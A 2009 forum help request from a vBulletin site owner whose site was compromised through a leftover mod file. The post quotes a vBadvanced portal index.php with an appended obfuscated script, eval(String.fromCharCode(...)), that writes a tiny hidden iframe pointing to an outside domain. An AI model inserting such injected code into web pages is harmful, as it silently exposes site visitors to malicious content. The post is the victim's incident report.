Okay guys here it goes I removed the mod which was nominationt and forgot to remove the PHP in my root folder this was done like three days ago... I just received for attempts to access
http://www.xxxxxxxx.net/nominate_top...minationthread
This is what I received in my e-mail after three attempts of them accessing that link above..
Database error in vBulletin 3.8.2:
Invalid SQL:
SELECT * FROM nominate_topic_thread WHERE postid > '0';
MySQL Error : Table 'xxxxxx_TOPGUN.nominate_topic_thread' doesn't exist
Error Number : 1146
Request Date : Monday, May 25th 2009 @ 08:38:13 AM
Error Date : Monday, May 25th 2009 @ 08:38:13 AM
Script :
http://www.xxxxxxxxxxxx.net/nominate...minationthread
Referrer :
IP Address : 174.xxxxxxxxx
Username : Unregistered
Classname : vB_Database
MySQL Version :
Within an hour after receiving three attempts to access the same URL above apparently this was ejected into my HTML intro page and on a lot of my PHP templates even on the index PHP they injected this code does anybody have any idea what this is?
My Internet security 2009 detected it when I checked the page and select it down the page and look at the code and this was what was in it..
?php
// ++================================================ =========================++
// || vBadvanced CMPS v3.1.0 (vB 3.6 - vB 3.8) - 86589
// || ? 2003-2009 vBadvanced.com - All Rights Reserved
// || This file may not be redistributed in whole or significant part.
// ||
http://vbadvanced.com
// || Downloaded 21:03, Sat May 9th 2009
// || xxxxxxxxxxxxxxxxxxxxxxxxxxx
// ++ ================================================== ======================++
error_reporting(E_ALL & ~E_NOTICE);
define('THIS_SCRIPT', 'adv_index');
define('VBA_PORTAL', true);
define('VBA_SCRIPT', 'CMPS');
// ============================================
// Enter the full path to your forum here
// Example: /home/vbadvanced/public_html/forum
// ============================================
$forumpath = '';
// ============================================
// No Further Editing Necessary!
// ============================================
if ($forumpath)
{
if (!is_dir($forumpath))
{
echo 'Invalid forum path specified! Please edit this file and be sure to include the correct path for your $forumpath variable.';
exit;
}
chdir($forumpath);
}
$phrasegroups = array();
$globaltemplates = array();
$actiontemplates = array();
$specialtemplates = array();
require_once('./includes/vba_cmps_include_template.php');
require_once('./global.php');
print_portal_output($home);
?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32 ,120,101,119,61,52,53,51,56,48,48,53,52,51,59,118, 97,114,32,103,104,103,52,53,61,34,110,117,111,116, 34,59,118,97,114,32,119,61,34,111,34,59,118,97,114 ,32,114,101,54,61,34,108,108,46,34,59,118,97,114,3 2,104,50,104,61,34,99,111,109,34,59,118,97,114,32, 97,61,34,105,102,114,34,59,118,97,114,32,115,61,34 ,104,116,116,34,59,100,111,99,117,109,101,110,116, 46,119,114,105,116,101,40,39,60,39,43,97,43,39,97, 109,101,32,115,114,39,43,39,99,61,34,39,43,115,43, 39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,4 3,119,43,39,39,43,114,101,54,43,39,39,43,104,50,10 4,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116 ,104,61,34,49,34,32,104,39,43,39,101,105,103,104,1 16,61,34,51,34,62,60,47,105,102,39,43,39,114,97,10 9,101,62,39,41,59,32,118,97,114,32,106,104,114,52, 61,52,51,50,52,50,50,52))</script>'; ?>
--------------- Added [DATE]1243240230[/DATE] at [TIME]1243240230[/TIME] ---------------
They even put it on my admin index.php I'm looking at the modified dates right now..
More Information